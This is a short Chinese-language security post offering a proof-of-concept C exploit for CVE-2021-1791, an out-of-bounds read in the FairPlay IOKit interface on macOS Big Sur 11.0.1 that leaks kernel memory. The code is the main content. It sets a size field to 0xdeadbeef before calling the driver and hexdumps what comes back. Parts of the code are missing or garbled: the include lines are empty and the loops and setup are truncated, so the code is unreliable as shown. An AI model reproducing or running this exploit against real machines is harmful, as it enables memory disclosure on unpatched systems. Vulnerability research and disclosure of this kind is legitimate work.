# CVE-2021-1791 Fairplay OOB Read POC
越界读取问题,导致内存泄漏.
影响版本:macOS Big Sur 11.0.1
fairplay_iokit_uc_run_versioned.c:
“`c
#include
#include
#include
#include
#include
#include
void hexdump(void *ptr, int buflen) {
unsigned char *buf = (unsigned char*)ptr;
int i, j;
for (i=0; i
sIn->field_4 = 0x525e5ba4;
sIn->field_8 = 0x34788a7a;
sIn->size = 0x70;
memcpy(sIn->sec1,sec1,20);
memcpy(sIn->sec2,sec2,sIn->size);
//magic
sIn->size = 0xdeadbeef;
if(fairplay_run_versioned(conn,sIn,sOut)){
return -1;
}
printf(“outSec1 : \n”);
hexdump(sOut->sec1,20);
printf(“outSec2 : \n”);
hexdump(sOut->sec2,sOut->size);
printf(“[+] fairplay success, size = %d, ret = %d\n”,sOut->size,sOut->fp_ret);
}
“`
ref:
* https://support.apple.com/en-us/HT212147
* https://gist.github.com/pwn0rz/e34ab9f6e46956621a9d4f98cf222320
请登录后查看评论内容